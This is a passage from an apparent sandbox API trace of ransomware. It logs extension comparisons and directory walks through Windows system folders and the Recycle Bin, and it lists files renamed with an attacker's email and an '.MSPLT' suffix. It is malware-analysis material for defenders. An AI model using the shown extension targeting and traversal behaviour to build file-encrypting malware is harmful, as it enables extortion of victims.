[0283.199] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".lgf") returned 4 [0283.199] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".lgp") returned 4 [0283.200] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".log") returned 4 [0283.200] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".m1v") returned 4 [0283.200] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".m4a") returned 4 [0283.200] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".m4v") returned 4 [0283.200] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".max") returned 4 [0283.200] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".md") returned 3 [0283.200] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0283.200] lstrlenW (lpString=".mda") returned 4 [0283.200] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".mdb") returned 4 [0283.200] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".mde") returned 4 [0283.200] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".mdf") returned 4 [0283.200] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".mdw") returned 4 [0283.200] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".mef") returned 4 [0283.200] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0283.200] lstrlenW (lpString=".mft") returned 4 [0283.200] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mfw") returned 4 [0283.201] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mht") returned 4 [0283.201] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mhtml") returned 6 [0283.201] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0283.201] lstrlenW (lpString=".mka") returned 4 [0283.201] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mkidx") returned 6 [0283.201] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0283.201] lstrlenW (lpString=".mkv") returned 4 [0283.201] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mos") returned 4 [0283.201] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mov") returned 4 [0283.201] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mp3") returned 4 [0283.201] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mp4") returned 4 [0283.201] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mpeg") returned 5 [0283.201] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0283.201] lstrlenW (lpString=".mpg") returned 4 [0283.201] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mpv") returned 4 [0283.201] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mrw") returned 4 [0283.201] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".msg") returned 4 [0283.201] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0283.201] lstrlenW (lpString=".mxl") returned 4 [0283.202] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".myd") returned 4 [0283.202] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".myi") returned 4 [0283.202] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".nef") returned 4 [0283.202] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".nrw") returned 4 [0283.202] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".obj") returned 4 [0283.202] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".odb") returned 4 [0283.202] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".odc") returned 4 [0283.202] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".odm") returned 4 [0283.202] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".odp") returned 4 [0283.202] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".ods") returned 4 [0283.202] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".oft") returned 4 [0283.202] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".one") returned 4 [0283.202] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".onepkg") returned 7 [0283.202] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0283.202] lstrlenW (lpString=".onetoc2") returned 8 [0283.202] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0283.202] lstrlenW (lpString=".opt") returned 4 [0283.202] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".oqy") returned 4 [0283.202] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0283.202] lstrlenW (lpString=".orf") returned 4 [0283.203] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".p12") returned 4 [0283.203] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".p7b") returned 4 [0283.203] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".p7c") returned 4 [0283.203] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pam") returned 4 [0283.203] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pbm") returned 4 [0283.203] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pct") returned 4 [0283.203] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pcx") returned 4 [0283.203] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pdd") returned 4 [0283.203] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pdf") returned 4 [0283.203] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pdp") returned 4 [0283.203] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pef") returned 4 [0283.203] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pem") returned 4 [0283.203] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pff") returned 4 [0283.203] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pfm") returned 4 [0283.203] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pfx") returned 4 [0283.203] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0283.203] lstrlenW (lpString=".pgm") returned 4 [0283.203] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0283.204] lstrlenW (lpString=".php") returned 4 [0283.204] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0283.204] lstrlenW (lpString=".php3") returned 5 [0283.204] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0283.204] lstrlenW (lpString=".php4") returned 5 [0283.204] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0283.204] lstrlenW (lpString=".php5") returned 5 [0283.204] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0283.204] lstrlenW (lpString=".phtml") returned 6 [0283.204] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0283.204] lstrlenW (lpString=".pict") returned 5 [0283.204] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0283.204] lstrlenW (lpString=".pl") returned 3 [0283.204] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0283.204] lstrlenW (lpString=".pls") returned 4 [0283.204] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0283.204] lstrlenW (lpString=".pm") returned 3 [0283.204] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0283.204] lstrlenW (lpString=".png") returned 4 [0283.204] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0283.204] lstrlenW (lpString=".pnm") returned 4 [0283.204] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0283.204] lstrlenW (lpString=".pot") returned 4 [0283.204] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0283.204] lstrlenW (lpString=".potm") returned 5 [0283.204] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0283.204] lstrlenW (lpString=".potx") returned 5 [0283.204] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0283.204] lstrlenW (lpString=".ppa") returned 4 [0283.204] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0283.204] lstrlenW (lpString=".ppam") returned 5 [0283.205] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0283.205] lstrlenW (lpString=".ppm") returned 4 [0283.205] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".pps") returned 4 [0283.205] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".ppsm") returned 5 [0283.205] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0283.205] lstrlenW (lpString=".ppt") returned 4 [0283.205] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".pptm") returned 5 [0283.205] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0283.205] lstrlenW (lpString=".pptx") returned 5 [0283.205] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0283.205] lstrlenW (lpString=".prn") returned 4 [0283.205] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".ps") returned 3 [0283.205] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0283.205] lstrlenW (lpString=".psb") returned 4 [0283.205] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".psd") returned 4 [0283.205] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".pst") returned 4 [0283.205] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".ptx") returned 4 [0283.205] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".pub") returned 4 [0283.205] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0283.205] lstrlenW (lpString=".pwm") returned 4 [0283.205] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0283.206] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dd53c9, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dd53c9, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58dfb734, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1894, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="oobe_2017_09_07_03_08_57_737.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="OOBE_2~1.MSP")) returned 1 [0283.206] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dfb734, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dfb734, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 1 [0283.206] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dfb734, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dfb734, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 0 [0283.206] FindClose (in: hFindFile=0x48a270 | out: hFindFile=0x48a270) returned 1 [0283.207] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4001738 | out: hHeap=0x470000) returned 1 [0283.207] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0283.207] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4001738 [0283.208] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName=".", cAlternateFileName="")) returned 0x48a270 [0283.265] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="..", cAlternateFileName="")) returned 1 [0283.265] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c498cf, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59c498cf, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59c95d9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x233c8, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="GetCurrentOOBE.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="GETCUR~2.MSP")) returned 1 [0283.265] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58e6ddfa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58e6ddfa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="GetCurrentRollback.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="GETCUR~1.MSP")) returned 1 [0283.265] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59bfd465, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59bfd465, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="PartnerSetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 1 [0283.266] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x595baff0, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x595baff0, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x595e1236, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="preoobe.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PREOOB~1.MSP")) returned 1 [0283.266] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59bb102a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59bb102a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59bd710c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="SetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPC~1.MSP")) returned 1 [0283.266] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59bb102a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59bb102a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59bd710c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="SetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPC~1.MSP")) returned 0 [0283.266] FindClose (in: hFindFile=0x48a270 | out: hFindFile=0x48a270) returned 1 [0283.288] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4001738 | out: hHeap=0x470000) returned 1 [0283.288] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0283.288] FindClose (in: hFindFile=0x48a1b0 | out: hFindFile=0x48a1b0) returned 1 [0283.288] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0283.290] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0283.290] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0283.291] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName=".", cAlternateFileName="")) returned 0x48a1b0 [0283.291] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="..", cAlternateFileName="")) returned 1 [0283.291] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x58e6ddfa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e6ddfa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0283.291] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0283.292] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x16, ftLastAccessTime.dwLowDateTime=0x2, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffffed61, nFileSizeHigh=0xffffed61, nFileSizeLow=0xc83, dwReserved0=0xffffe996, dwReserved1=0xc85, cFileName="", cAlternateFileName="ꤨL\x08")) returned 0xffffffff [0283.293] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0283.293] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0283.293] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0283.293] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe996, dwReserved1=0xc85, cFileName=".", cAlternateFileName="")) returned 0x48a270 [0283.293] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe996, dwReserved1=0xc85, cFileName="..", cAlternateFileName="")) returned 1 [0283.293] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf55a58a9, ftCreationTime.dwHighDateTime=0x1d60985, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0xffffe996, dwReserved1=0xc85, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0283.293] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x593a4fb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x593a4fb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffe996, dwReserved1=0xc85, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 1 [0283.294] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x593a4fb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x593a4fb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffe996, dwReserved1=0xc85, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 0 [0283.294] FindClose (in: hFindFile=0x48a270 | out: 